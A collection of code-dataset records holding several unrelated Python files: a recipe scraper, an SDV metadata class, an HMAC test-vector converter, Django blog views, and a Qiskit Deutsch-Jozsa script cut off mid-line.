{"seq_id":"330855095","text":"import collections\nimport json\nimport os\nimport re\nfrom pathlib import Path\n\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef get_site_access(url):\n \"\"\"Validates the URL and returns a BeautifulSoup object.\"\"\"\n try:\n response = requests.get(url)\n response.raise_for_status()\n src = response.text\n return BeautifulSoup(src, 'lxml')\n except Exception as ex:\n exit(f\"{ex}\\nCan't get data from server. URL: {url}\")\n\n\ndef get_recipes_links(eda_url):\n \"\"\"Returns links to the dishes.\"\"\"\n soup = get_site_access(eda_url)\n\n dishes = soup.find_all('div', class_='card__description')\n recipes_links = {}\n amount = 0 # number of recipes collected\n for dish in dishes:\n dish_title = dish.find('div', class_='card__title title').text\n dish_link = dish.find('a').get('href')\n recipes_links[dish_title] = f'https://www.edimdoma.ru{dish_link}'\n amount += 1\n if amount == 21:\n break\n return recipes_links\n\n\ndef get_recipe(title, link, meal):\n \"\"\"Collects information about a dish.\"\"\"\n soup = get_site_access(link)\n\n # how many servings the recipe yields\n portions = soup.find(class_='field__container').find(attrs={'name': 'servings'})['value']\n\n dish = collections.defaultdict(list)\n dish['Название блюда'] = title\n dish['Количество порций'] = portions\n fractions = ('½', '⅓', '¼', '⅕', '⅛')\n\n products = soup.find('div', {\"id\": \"recipe_ingredients_block\"}).find_all(class_='definition-list-table')\n # iterate over the products in the ingredient list\n for product in products:\n product_title = product.find(class_='recipe_ingredient_title').text\n dish['Ингредиенты'].append(product_title)\n\n product_count = product.find(class_='definition-list-table__td definition-list-table__td_value').text\n # check whether product_count contains digits\n if re.search(r'\\d+', product_count) or any(fraction for fraction in fractions if fraction in product_count):\n items = product_count.split()\n digit = [item for item in items if item.replace(',', '').isdigit() or item in fractions]\n measure = [item for item in items if item not in digit]\n dish['Количество'].append(''.join(digit))\n dish['Мера'].append(''.join(measure))\n else:\n dish['Количество'].append(None)\n dish['Мера'].append(product_count)\n product_price = 0 # a price-lookup function would be called here\n\n cooking_steps = soup.find_all(class_='plain-text recipe_step_text')\n # write the cooking steps into the dish dict\n for number, step in enumerate(cooking_steps, 1):\n dish['Шаги готовки'].append(f'{number}. 
{step.text}')\n\n return dish\n\n\ndef get_recipes_by_category(meal, page_number):\n \"\"\"Собирает данные по всем рецептам из данной категории и записывает их в JSON файл\"\"\"\n dishes = []\n edimdoma_url = f'https://www.edimdoma.ru/retsepty?page={page_number}&tags%5Brecipe_mealtime%5D%5B%5D={meal}'\n recipes_links = get_recipes_links(edimdoma_url)\n for dish_title, dish_link in recipes_links.items():\n dish = get_recipe(dish_title, dish_link, meal)\n dishes.append(dish)\n with open(f'recipes/{page_number}/{meal}.json', 'w', encoding='utf-8') as file:\n json.dump(dishes, file, indent=4, ensure_ascii=False)\n print(f'Обработка категории {meal} завершена.')\n return f'Обработка категории {meal} завершена.'\n\n\ndef main():\n if 'recipes' not in os.listdir('.'):\n Path('recipes').mkdir(parents=True, exist_ok=True)\n\n meals = ['завтрак', 'обед', 'ужин', 'полдник']\n # Скачиваем 5 различных списков блюд по каждому приему пищи\n for page in range(1, 6):\n Path(f'recipes/{page}').mkdir(parents=True, exist_ok=True)\n for meal in meals:\n get_recipes_by_category(meal, page)\n print('Списки рецептов успешно сформированы')\n else:\n print('Списки рецептов уже существуют')\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"recipes.py","file_name":"recipes.py","file_ext":"py","file_size_in_byte":4601,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"18212352","text":"import copy\nimport json\nimport logging\nimport os\nfrom collections import defaultdict\n\nimport numpy as np\nimport pandas as pd\nfrom rdt import HyperTransformer, transformers\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef _read_csv_dtypes(table_meta):\n \"\"\"Get the dtypes specification that needs to be passed to read_csv.\"\"\"\n dtypes = dict()\n for name, field in table_meta['fields'].items():\n field_type = field['type']\n if field_type == 'categorical':\n dtypes[name] = str\n elif field_type == 'id' and field.get('subtype', 'integer') == 'string':\n dtypes[name] = str\n\n return dtypes\n\n\ndef _parse_dtypes(data, table_meta):\n \"\"\"Convert the data columns to the right dtype after loading the CSV.\"\"\"\n for name, field in table_meta['fields'].items():\n field_type = field['type']\n if field_type == 'datetime':\n data[name] = pd.to_datetime(data[name], format=field['format'], exact=False)\n elif field_type == 'numerical' and field.get('subtype') == 'integer':\n data[name] = data[name].dropna().astype(int)\n elif field_type == 'id' and field.get('subtype', 'integer') == 'integer':\n data[name] = data[name].dropna().astype(int)\n\n return data\n\n\ndef _load_csv(root_path, table_meta):\n \"\"\"Load a CSV with the right dtypes and then parse the columns.\"\"\"\n relative_path = os.path.join(root_path, table_meta['path'])\n dtypes = _read_csv_dtypes(table_meta)\n\n data = pd.read_csv(relative_path, dtype=dtypes)\n data = _parse_dtypes(data, table_meta)\n\n return data\n\n\nclass Metadata:\n \"\"\"Dataset Metadata.\n\n The Metadata class provides a unified layer of abstraction over the dataset\n metadata, which includes both the necessary details to load the data from\n the hdd and to know how to parse and transform it to numerical data.\n\n Args:\n metadata (str or dict):\n Path to a ``json`` file that contains the metadata or a ``dict`` representation\n of ``metadata`` following the same structure.\n\n root_path (str):\n The path where the ``metadata.json`` is located. 
Defaults to ``None``.\n \"\"\"\n\n def _get_relationships(self):\n \"\"\"Extract information about child-parent relationships.\n\n Creates the following attributes:\n * ``_child_map``: set of child tables that each table has.\n * ``_parent_map``: set of parents that each table has.\n \"\"\"\n self._child_map = defaultdict(set)\n self._parent_map = defaultdict(set)\n\n for table_meta in self._metadata['tables'].values():\n if table_meta.get('use', True):\n table = table_meta['name']\n for field_meta in table_meta['fields'].values():\n ref = field_meta.get('ref')\n if ref:\n parent = ref['table']\n self._child_map[parent].add(table)\n self._parent_map[table].add(parent)\n\n @staticmethod\n def _dict_metadata(metadata):\n \"\"\"Get a metadata ``dict`` with SDV format.\n\n For each table create a dict of fields from a previous list of fields.\n\n Args:\n metadata (dict):\n Original metadata to format.\n\n Returns:\n dict:\n Formatted metadata dict.\n \"\"\"\n new_metadata = copy.deepcopy(metadata)\n tables = new_metadata['tables']\n new_tables = dict()\n\n for table in tables:\n new_tables[table['name']] = table\n\n fields = table['fields']\n new_fields = dict()\n for field in fields:\n new_fields[field['name']] = field\n\n table['fields'] = new_fields\n\n new_metadata['tables'] = new_tables\n\n return new_metadata\n\n def __init__(self, metadata, root_path=None):\n if isinstance(metadata, str):\n self.root_path = root_path or os.path.dirname(metadata)\n with open(metadata) as metadata_file:\n metadata = json.load(metadata_file)\n else:\n self.root_path = root_path or '.'\n\n self._metadata = self._dict_metadata(metadata)\n self._hyper_transformers = dict()\n self._get_relationships()\n\n def get_children(self, table_name):\n \"\"\"Get table children.\n\n Args:\n table_name (str):\n Name of the table from which to get the children.\n\n Returns:\n set:\n Set of children for the given table.\n \"\"\"\n return self._child_map[table_name]\n\n def get_parents(self, table_name):\n \"\"\"Get table parents.\n\n Args:\n table_name (str):\n Name of the table from which to get the parents.\n\n Returns:\n set:\n Set of parents for the given table.\n \"\"\"\n return self._parent_map[table_name]\n\n def get_table_meta(self, table_name):\n \"\"\"Get the metadata dict for a table.\n\n Args:\n table_name (str):\n Name of table to get data for.\n\n Returns:\n dict:\n table metadata\n \"\"\"\n return self._metadata['tables'][table_name]\n\n def load_table(self, table_name):\n \"\"\"Load table data.\n\n Args:\n table_name (str):\n Name of the table that we want to load.\n\n Returns:\n pandas.DataFrame:\n DataFrame with the contents of the table.\n \"\"\"\n LOGGER.info('Loading table %s', table_name)\n table_meta = self.get_table_meta(table_name)\n return _load_csv(self.root_path, table_meta)\n\n def _get_dtypes(self, table_name, ids=False):\n \"\"\"Get a ``dict`` with the ``dtypes`` for each field of a given table.\n\n Args:\n table_name (str):\n Table name for which to retrieve the ``dtypes``.\n ids (bool):\n Whether or not to include the id fields. 
Defaults to ``False``.\n\n Returns:\n dict:\n Dictionary that contains the field names and data types from a table.\n\n Raises:\n ValueError:\n If a field has an invalid type or subtype.\n \"\"\"\n dtypes = dict()\n table_meta = self.get_table_meta(table_name)\n for name, field in table_meta['fields'].items():\n field_type = field['type']\n if field_type == 'categorical':\n dtypes[name] = np.object\n\n elif field_type == 'boolean':\n dtypes[name] = bool\n\n elif field_type == 'numerical':\n field_subtype = field.get('subtype', 'float')\n if field_subtype == 'integer':\n dtypes[name] = int\n elif field_subtype == 'float':\n dtypes[name] = float\n else:\n raise ValueError('Invalid {} subtype {} - {}'.format(\n field_type, field_subtype, name))\n\n elif field_type == 'datetime':\n dtypes[name] = np.datetime64\n\n elif field_type == 'id':\n if ids:\n if (name != table_meta.get('primary_key')) and not field.get('ref'):\n raise ValueError(\n 'id field `{}` is neither a primary or a foreign key'.format(name))\n\n field_subtype = field.get('subtype', 'integer')\n if field_subtype == 'integer':\n dtypes[name] = int\n elif field_subtype == 'string':\n dtypes[name] = str\n else:\n raise ValueError('Invalid {} subtype: {} - {}'.format(\n field_type, field_subtype, name))\n\n else:\n raise ValueError('Invalid field type: {} - '.format(field_type, name))\n\n return dtypes\n\n def _get_pii_fields(self, table_name):\n \"\"\"Get the ``pii_category`` for each field that contains PII.\n\n Args:\n table_name (str):\n Table name for which to get the pii fields.\n\n Returns:\n dict:\n pii field names and categories.\n \"\"\"\n pii_fields = dict()\n for name, field in self.get_table_meta(table_name)['fields'].items():\n if field['type'] == 'categorical' and field.get('pii', False):\n pii_fields[name] = field['pii_category']\n\n return pii_fields\n\n @staticmethod\n def _get_transformers(dtypes, pii_fields):\n \"\"\"Create the transformer instances needed to process the given dtypes.\n\n Temporary drop-in replacement of ``HyperTransformer._analyze`` method,\n before RDT catches up.\n\n Args:\n dtypes (dict):\n mapping of field names and dtypes.\n pii_fields (dict):\n mapping of pii field names and categories.\n\n Returns:\n dict:\n mapping of field names and transformer instances.\n \"\"\"\n transformers_dict = dict()\n for name, dtype in dtypes.items():\n dtype = np.dtype(dtype)\n if dtype.kind == 'i':\n transformer = transformers.NumericalTransformer(dtype=int)\n elif dtype.kind == 'f':\n transformer = transformers.NumericalTransformer(dtype=float)\n elif dtype.kind == 'O':\n anonymize = pii_fields.get(name)\n transformer = transformers.CategoricalTransformer(anonymize=anonymize)\n elif dtype.kind == 'b':\n transformer = transformers.BooleanTransformer()\n elif dtype.kind == 'M':\n transformer = transformers.DatetimeTransformer()\n else:\n raise ValueError('Unsupported dtype: {}'.format(dtype))\n\n LOGGER.info('Loading transformer %s for field %s',\n transformer.__class__.__name__, name)\n transformers_dict[name] = transformer\n\n return transformers_dict\n\n def _load_hyper_transformer(self, table_name):\n \"\"\"Create and return a new ``rdt.HyperTransformer`` instance for a table.\n\n First get the ``dtypes`` and ``pii fields`` from a given table, then use\n those to build a transformer dictionary to be used by the ``HyperTransformer``.\n\n Args:\n table_name (str):\n Table name for which to load the HyperTransformer.\n\n Returns:\n rdt.HyperTransformer:\n Instance of ``rdt.HyperTransformer`` for the given 
table.\n \"\"\"\n dtypes = self._get_dtypes(table_name)\n pii_fields = self._get_pii_fields(table_name)\n transformers_dict = self._get_transformers(dtypes, pii_fields)\n return HyperTransformer(transformers=transformers_dict)\n\n def transform(self, table_name, data):\n \"\"\"Transform data for a given table.\n\n If the ``HyperTransformer`` for a table is ``None`` it is created.\n\n Args:\n table_name (str):\n Name of the table that is being transformer.\n data (pandas.DataFrame):\n Table data.\n\n Returns:\n pandas.DataFrame:\n Transformed data.\n \"\"\"\n hyper_transformer = self._hyper_transformers.get(table_name)\n if hyper_transformer is None:\n hyper_transformer = self._load_hyper_transformer(table_name)\n fields = list(hyper_transformer.transformers.keys())\n hyper_transformer.fit(data[fields])\n self._hyper_transformers[table_name] = hyper_transformer\n\n hyper_transformer = self._hyper_transformers.get(table_name)\n fields = list(hyper_transformer.transformers.keys())\n return hyper_transformer.transform(data[fields])\n\n def get_table_names(self):\n \"\"\"Get the list of table names.\n\n Returns:\n list:\n table names.\n \"\"\"\n return list(self._metadata['tables'].keys())\n\n def get_tables(self, tables=None):\n \"\"\"Get a dictionary with data from multiple tables.\n\n If a ``tables`` list is given, only load the indicated tables.\n Otherwise, load all the tables from this metadata.\n\n Args:\n tables (list):\n List of table names. Defaults to ``None``.\n\n Returns:\n dict(str, pandasd.DataFrame):\n mapping of table names and their data loaded as ``pandas.DataFrame`` instances.\n \"\"\"\n return {\n table_name: self.load_table(table_name)\n for table_name in tables or self.get_table_names()\n }\n\n def get_fields(self, table_name):\n \"\"\"Get table fields metadata.\n\n Args:\n table_name (str):\n Name of the table to get the fields from.\n\n Returns:\n dict:\n Mapping of field names and their metadata dicts.\n \"\"\"\n return self.get_table_meta(table_name)['fields']\n\n def get_primary_key(self, table_name):\n \"\"\"Get the primary key name of the indicated table.\n\n Args:\n table_name (str):\n Name of table for which to get the primary key field.\n\n Returns:\n str or None:\n Primary key field name. 
``None`` if the table has no primary key.\n \"\"\"\n return self.get_table_meta(table_name).get('primary_key')\n\n def get_foreign_key(self, parent, child):\n \"\"\"Get table foreign key field name.\n\n Args:\n parent (str):\n Name of the parent table.\n child (str):\n Name of the child table.\n\n Returns:\n str or None:\n Foreign key field name.\n\n Raises:\n ValueError:\n If the relationship does not exist.\n \"\"\"\n primary = self.get_primary_key(parent)\n\n for field in self.get_fields(child).values():\n ref = field.get('ref')\n if ref and ref['field'] == primary:\n return field['name']\n\n raise ValueError('{} is not parent of {}'.format(parent, child))\n\n def reverse_transform(self, table_name, data):\n \"\"\"Reverse the transformed data for a given table.\n\n Args:\n table_name (str):\n Name of the table to reverse transform.\n data (pandas.DataFrame):\n Data to be reversed.\n\n Returns:\n pandas.DataFrame\n \"\"\"\n hyper_transformer = self._hyper_transformers[table_name]\n reversed_data = hyper_transformer.reverse_transform(data)\n\n for name, dtype in self._get_dtypes(table_name, ids=True).items():\n reversed_data[name] = reversed_data[name].dropna().astype(dtype)\n\n return reversed_data\n","sub_path":"sdv/metadata.py","file_name":"metadata.py","file_ext":"py","file_size_in_byte":14873,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"503453764","text":"# MIT License\n\n# Copyright (c) 2018 brycx\n\n# Permission is hereby granted, free of charge, to any person obtaining a copy\n# of this software and associated documentation files (the \"Software\"), to deal\n# in the Software without restriction, including without limitation the rights\n# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n# copies of the Software, and to permit persons to whom the Software is\n# furnished to do so, subject to the following conditions:\n\n# The above copyright notice and this permission notice shall be included in all\n# copies or substantial portions of the Software.\n\n# THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n# SOFTWARE.\n\n\n\n\n\n\"\"\"\nThis script converts the NIST HMAC.rsp test vector file into a format\nthat will be used to test orion. Some input paramters are changed,\nand only the test vectors for HMAC-SHA256, HMAC-SHA384 and HMAC-SHA512 are\nkept. 
Any test vectors that have truncated output are also removed.\n\nThis means orion tests against the test vectors for an HMAC with the\nexact matching output size.\n\"\"\"\n\nkeyword_replacements = {\n 'Msg' : 'Input',\n 'Mac' : 'Output',\n}\n\nlines = []\n\nwith open('src/tests/test_data/HMAC.rsp') as infile:\n\n # Stores the most recent [Len=] parameter from original .rsp\n variant = 0\n\n for line in infile:\n for src, target in keyword_replacements.items():\n line = line.replace(src, target)\n\n # Check if output is accepted SHA variant and length\n Output_is_valid = False\n\n # Set HMAC with SHA variant tag according to [Len=] param\n if line.startswith(\"[L=32]\"):\n variant = 256\n if line.startswith(\"[L=48]\"):\n variant = 384\n if line.startswith(\"[L=64]\"):\n variant = 512\n\n if line.startswith(\"Output\") and len(line) == 74 and variant == 256:\n Output_is_valid = True\n if line.startswith(\"Output\") and len(line) == 106 and variant == 384:\n Output_is_valid = True\n if line.startswith(\"Output\") and len(line) == 138 and variant == 512:\n Output_is_valid = True\n\n # If two consecutive newlines appear, remove one\n if line == \"\\n\" and lines[-1] == \"\\n\":\n lines.pop()\n\n if not line.startswith(\"Output\") or Output_is_valid is True:\n if not line.startswith(\"[\"):\n if not line.startswith(\"Count\"):\n if not line.startswith(\"Klen\"):\n if not line.startswith(\"Tlen\"):\n lines.append(line)\n if line.startswith(\"Output\"):\n # Without newline chars, 73, 105, 137\n if variant == 256:\n lines.insert(-3, \"HMAC = SHA256\\n\")\n if variant == 384:\n lines.insert(-3, \"HMAC = SHA384\\n\")\n if variant == 512:\n lines.insert(-3, \"HMAC = SHA512\\n\")\n else:\n # If the output is truncated, then we remove the last three inserted lines\n for x in range(1,3):\n lines.pop()\n\nwith open('src/tests/test_data/HMAC_fmt.rsp', 'w') as outfile:\n for line in lines:\n outfile.write(line)\n\n# Empty list\nlines[:] = []\n","sub_path":"src/tests/test_generation/make_nist_hmac.py","file_name":"make_nist_hmac.py","file_ext":"py","file_size_in_byte":3739,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"119754403","text":"from django.shortcuts import render\r\nfrom django.core.paginator import Paginator, EmptyPage, PageNotAnInteger\r\nfrom post.models import Post \r\nfrom .models import Signup\r\nfrom django.contrib.auth.decorators import login_required\r\nfrom django.utils.safestring import mark_safe\r\nimport json\r\nfrom django.shortcuts import redirect\r\nfrom django.db.models import Count, Q\r\n\r\n\r\n\r\ndef search(request):\r\n queryset = Post.objects.all()\r\n query = request.GET.get('q') # getting the q=....\r\n if query: \r\n queryset = queryset.filter(\r\n Q(title__icontains=query) |\r\n Q(overview__icontains=query)\r\n ).distinct()\r\n context = {\r\n 'queryset' : queryset\r\n }\r\n return render(request, 'auth/search_result.html', context) \r\n\r\n\r\n\r\ndef get_category_count():\r\n queryset = Post.objects.values('categories__title').annotate(Count('categories__title'))\r\n return queryset\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n# Create your views here.\r\ndef home_feed(request):\r\n if not request.user.is_authenticated:\r\n return render(request, 'auth/logout.html', {})\r\n\r\n featured = Post.objects.filter(featured=True)\r\n latest = Post.objects.order_by('-timestamp')[0:3]\r\n \r\n if request.method == \"POST\":\r\n email = request.POST[\"email\"]\r\n new_signup = Signup()\r\n new_signup.email = email \r\n 
new_signup.save() # comment to save\r\n \r\n \r\n context = {\r\n 'object_list': featured,\r\n 'latest': latest\r\n }\r\n return render(request, 'auth/home_feed.html', context)\r\n\r\n\r\ndef blog(request):\r\n category_count = get_category_count()\r\n most_recent = Post.objects.order_by('-timestamp')[:3]\r\n post_list = Post.objects.all() \r\n paginator = Paginator(post_list, 4)\r\n page_request_var = 'page'\r\n page = request.GET.get(page_request_var)\r\n try:\r\n paginated_queryset = paginator.page(page)\r\n except PageNotAnInteger:\r\n paginated_queryset = paginator.page(1)\r\n except EmptyPage:\r\n paginated_queryset = paginator.page(paginator.num_pages)\r\n\r\n context = {\r\n 'queryset': paginated_queryset,\r\n 'most_recent': most_recent,\r\n 'page_request_var': page_request_var,\r\n 'category_count' : category_count\r\n\r\n } \r\n return render(request, 'auth/blog.html', context)\r\n\r\ndef post(request):\r\n return render(request, 'auth/post.html', {})\r\n\r\n@login_required\r\ndef chatroom(request, room_name):\r\n return render(request, 'auth/chatroom.html', {\r\n 'room_name_json' : mark_safe(json.dumps(room_name)),\r\n 'username' : mark_safe(json.dumps(request.user.username)),\r\n })\r\n","sub_path":"auth/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2640,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"54"} +{"seq_id":"602697291","text":"from qiskit import(\r\n QuantumCircuit,\r\n execute,\r\n Aer,\r\n IBMQ,\r\n transpile,\r\n assemble)\r\nfrom qiskit.visualization import plot_histogram\r\nfrom qiskit.providers.ibmq import least_busy\r\nfrom qiskit.quantum_info.operators import Operator\r\n# Import measurement calibration functions\r\nfrom qiskit.ignis.mitigation.measurement import (complete_meas_cal, tensored_meas_cal,\r\n CompleteMeasFitter, TensoredMeasFitter)\r\n\r\nfrom inspect import signature\r\nimport sys\r\nimport numpy as np\r\nimport itertools\r\nimport time\r\nimport datetime\r\nimport matplotlib.pyplot as plt\r\nimport func\r\nfrom func import *\r\n\r\n# MY_API_KEY = '' <-- ENTER KEY\r\n# IBMQ.save_account(MY_API_KEY)\r\nprovider = IBMQ.load_account()\r\nsmall_devices = provider.backends(filters=lambda x: x.configuration().n_qubits == 5\r\n and not x.configuration().simulator)\r\nbackend = least_busy(small_devices)\r\n#backend = provider.get_backend('ibmq_london')\r\n\r\nsimulator = Aer.get_backend('qasm_simulator')\r\n\r\n# U_f | x > | b > = | x > | b + f(x) >\r\n# preserve the state of the first n qubits\r\n# if f(x) == 0, we preserve the state of the helper qubit b\r\n# otherwise, if f(x) == 1, we invert the state of the helper qubit\r\n# U_f is just a 2^n by 2^n matrix where the \"diagonal\" consists of 2 by 2 blocks that are either the identity or Pauli X\r\n# the i-th diagonal block corresponds to the i-th possible n-bit input x_i to f\r\n## it is I if f(x_i) == 0\r\n## it is X if f(x_i) == 1\r\n# i.e., it is X^f(x_i)\r\ndef get_U_f(f, n):\r\n\tU_f = np.zeros((2 ** (n + 1), 2 ** (n + 1)))\r\n\tfor idx, inputs in enumerate(list(itertools.product([0, 1], repeat=n))):\r\n\t\toutput = f(inputs)\r\n\t\t\r\n\t\t# the 2x2 box on the diagonal is I\r\n\t\tif output == 0:\r\n\t\t\tU_f[2 * idx, 2 * idx] = 1\r\n\t\t\tU_f[2 * idx + 1, 2 * idx + 1] = 1\r\n\t\t\r\n\t\t# the 2x2 box on th diagonal is Pauli X\r\n\t\telif output == 1:\r\n\t\t\tU_f[2 * idx, 2 * idx + 1] = 1\r\n\t\t\tU_f[2 * idx + 1, 2 * idx] = 1\r\n\r\n\treturn U_f\r\n\r\n# generates the quantum circuit for Deutsch-Jozsa given U_f and n (the length 
of input bit strings)\r\ndef dj_program(U_f, n):\r\n\tcircuit = QuantumCircuit(n + 1, n)\r\n\r\n\t# invert the helper qubit to make it 1\r\n\tcircuit.x(n)\r\n\t\r\n\t# apply Hadamard to all input qubits and helper qubit\r\n\tfor i in range(n + 1):\r\n\t\tcircuit.h(i)\r\n\r\n\t# define the U_f gate based on the unitary matrix returned by get_U_f\r\n\tU_f_gate = Operator(U_f)\r\n\tcircuit.unitary(U_f_gate, range(n, -1, -1), label='U_f')\r\n\t\r\n\t# apply Hadamard to all input qubits\r\n\tfor i in range(n):\r\n\t\tcircuit.h(i)\r\n\r\n\treturn circuit\r\n\r\n# pretty print results\r\ndef print_results(test_name, circuit_size, results, meas_filter, transpile_time, trials, n, b):\r\n\r\n\tprint()\r\n\tprint()\r\n\tprint('===================================')\r\n\tprint()\r\n\tprint('Test:', test_name)\r\n\tprint('Transpile time:', transpile_time, 'sec')\r\n\tprint('Number of gates in transpiled circuit:', circuit_size)\r\n\tprint('Run time:', sum([result.time_taken for result in results]) / trials, 'sec')\r\n\tprint()\r\n\tprint('===================================')\r\n\tprint('===================================')\r\n\tprint()\r\n\r\n\t# Compute counts and error-mitigated counts\r\n\tcounts = {}\r\n\tmitigated_counts = {}\r\n\tfor result in results:\r\n\t\tc = result.get_counts()\r\n\t\tmitigated_results = meas_filter.apply(result)\r\n\t\tmc = mitigated_results.get_counts(0)\r\n\r\n\t\tcounts = {key: counts.get(key, 0) + c.get(key, 0) for key in set(counts) | set(c)}\r\n\t\tmitigated_counts = {key: mitigated_counts.get(key, 0) + mc.get(key, 0) for key in set(mitigated_counts) | set(mc)}\r\n\t\t\r\n\tcounts_sorted = sorted(counts.items(), key=lambda item: item[1], reverse=True)\r\n\tfor idx, (key, value) in enumerate(counts_sorted):\r\n\t\t\tverdict = 'Constant!'\r\n\t\t\tprint('===================================')\r\n\t\t\tprint()\r\n\t\t\tprint('Result', idx + 1)\r\n\t\t\tprint('Frequency:', counts[key])\r\n\t\t\tprint('Mitigated frequency:', mitigated_counts[key])\r\n\r\n\r\n # Constant function if measure all 0's, balanced otherwise\r\n\t\t\tfor i in range(n):\r\n\t\t\t if key[i] != '0': \r\n\t\t\t verdict = 'Balanced!'\r\n\t\t\t break\r\n\r\n\t\t\tprint('Measurement:', key)\r\n\t\t\tprint('Function is:', verdict)\r\n\t\t\tprint()\r\n\t\t\tprint()\r\n\t\t\tprint('===================================')\r\n\t\t\tprint()\r\n\t\t\tprint()\r\n\r\n\tplot_histogram([counts, mitigated_counts], title=test_name, legend=['raw', 'mitigated'])\r\n\tplt.axhline(1/(2 ** n), color='k', linestyle='dashed', linewidth=1)\r\n\tplt.savefig('deutsch_jozsa_hist_%s_%d_{:%Y-%m-%d_%H-%M-%S}.png'.format(datetime.datetime.now()) % (test_name, trials), bbox_inches = \"tight\")\t\r\n\r\nif __name__ == '__main__':\r\n\r\n\t# Process options and arguments\r\n\tif len(sys.argv) <= 2:\r\n\t\tprint('\\nLook in func.py for a function name to pass in as an argument, followed by the length of the bit string and the number of trials.\\nAlternatively, pass in the function name followed by \\'--graph\\' to create of graph of the scalability of the chosen function.\\nRefer to README for additional info.\\n')\r\n\t\texit(1)\r\n\tgraph = False\r\n\tif sys.argv[2] == '--graph':\r\n\t\tgraph = True\r\n\r\n\tfunc_in_name = sys.argv[1]\r\n\ttry:\r\n\t\tfunc_in = getattr(func, func_in_name)\r\n\texcept AttributeError:\r\n\t\traise NotImplementedError(\"Class `{}` does not implement `{}`\".format(func.__class__.__name__, func_in_name))\r\n\tsig = signature(func_in)\r\n\tif len(sig.parameters) != 1:\r\n\t\tprint('\\nSpecified function must 
only accept a single parameter: a bit string passed in as a Python list. Refer to README for additional info.\\n') \r\n\t\texit(1)\r\n\r\n\tif not graph:\r\n\t\tn = int(sys.argv[2])\r\n\t\ttrials = int(sys.argv[3])\r\n\t\tif len(sys.argv) > 4:\r\n\t\t\ttry:\r\n\t\t\t\toptimization_level = int(sys.argv[4])\r\n\t\t\t\tif optimization_level < 0 or optimization_level > 3:\r\n\t\t\t\t\tprint('\\nOptimization level must be an integer between 0 and 3, inclusive. Higher levels generate more optimized circuits, at the expense of longer transpilation time.\\n')\r\n\t\t\t\t\texit(1)\r\n\t\t\texcept:\r\n\t\t\t\tprint('\\nOptimization level must be an integer between 0 and 3, inclusive. Higher levels generate more optimized circuits, at the expense of longer transpilation time.\\n')\r\n\t\t\t\texit(1)\r\n\t\telse:\r\n\t\t\toptimization_level = 1\r\n\t\r\n\tif not graph:\r\n\t\tb = func_in([0]*n)\r\n\t\tU_f = get_U_f(func_in, n)\r\n\r\n\t\tcircuit = dj_program(U_f, n)\r\n\t\tcircuit.measure(range(n), range(n - 1, -1, -1))\r\n\r\n\t\t# Calibration matrix\r\n\t\tmeas_calibs, state_labels = complete_meas_cal(qubit_list=range(n), circlabel='mcal')\r\n\t\tjob = execute(meas_calibs, backend=backend, shots=8192)\r\n\t\tcal_results = job.result()\r\n\t\tmeas_fitter = CompleteMeasFitter(cal_results, state_labels, circlabel='mcal')\r\n\r\n\t\t# Time transpilation separately\r\n\t\tstart = time.time()\r\n\t\tcircuit = transpile(circuit, backend, optimization_level=optimization_level)\r\n\t\tend = time.time()\r\n\r\n\t\t# Account for more than 8192 trials\r\n\t\tif trials > 8192:\r\n\t\t\ttrials_list = [8192] * (trials // 8192) + [trials % 8192]\r\n\t\telse:\r\n\t\t\ttrials_list = [trials]\r\n\t\tjobs = []\r\n\t\tfor t in trials_list:\r\n\t\t\tjobs.append(execute(circuit, backend, optimization_level=0, shots=t))\r\n\t\tdelayed_results = []\r\n\t\tfor j in jobs:\r\n\t\t\tdelayed_results.append(backend.retrieve_job(j.job_id()).result())\r\n\t\tprint_results(func_in_name, circuit.size(), delayed_results, meas_fitter.filter, end - start, trials, n, b)\r\n\t\r\n\tif graph:\r\n\t\tsim_transpile_times = [[], [], [], []]\r\n\t\tsim_run_times = [[], [], [], []]\r\n\t\tsim_gates = [[], [], [], []]\r\n\t\tqc_transpile_times = [[], [], [], []]\r\n\t\tqc_run_times = [[], [], [], []]\r\n\t\tqc_gates = [[], [], [], []]\r\n\t\tqubits = []\r\n\t\t\r\n\t\t# if the no. 
of test qubits are specified\r\n\t\tif len(sys.argv) > 3:\r\n\t\t\tqubits = sorted(list(map(int, sys.argv[3:])))\r\n\t\t\r\n\t\t# default is test on n = 1,2,3\r\n\t\telse:\r\n\t\t\tqubits = [1,2,3]\r\n\t\t\r\n\t\tfor optimization_level in range(4):\r\n\t\t\tfor n_test in qubits:\r\n\t\t\t\t\tU_f = get_U_f(func_in, n_test)\r\n\r\n\t\t\t\t\tcircuit = dj_program(U_f, n_test)\r\n\t\t\t\t\tcircuit.measure(range(n_test), range(n_test - 1, -1, -1))\r\n\r\n\t\t\t\t\tstart = time.time()\r\n\t\t\t\t\t# gates available on IBMQX5\r\n\t\t\t\t\tcircuit = transpile(circuit, basis_gates=['u1', 'u2', 'u3', 'cx'], optimization_level=optimization_level)\r\n\t\t\t\t\tend = time.time()\r\n\t\t\t\t\tjob = execute(circuit, simulator, optimization_level=0, shots=1)\r\n\r\n\t\t\t\t\tsim_transpile_times[optimization_level].append(end - start)\r\n\t\t\t\t\tsim_run_times[optimization_level].append(job.result().time_taken)\r\n\t\t\t\t\tsim_gates[optimization_level].append(circuit.size())\r\n\r\n\t\t\t\t\tstart = time.time()\r\n\t\t\t\t\tcircuit = transpile(circuit, backend, 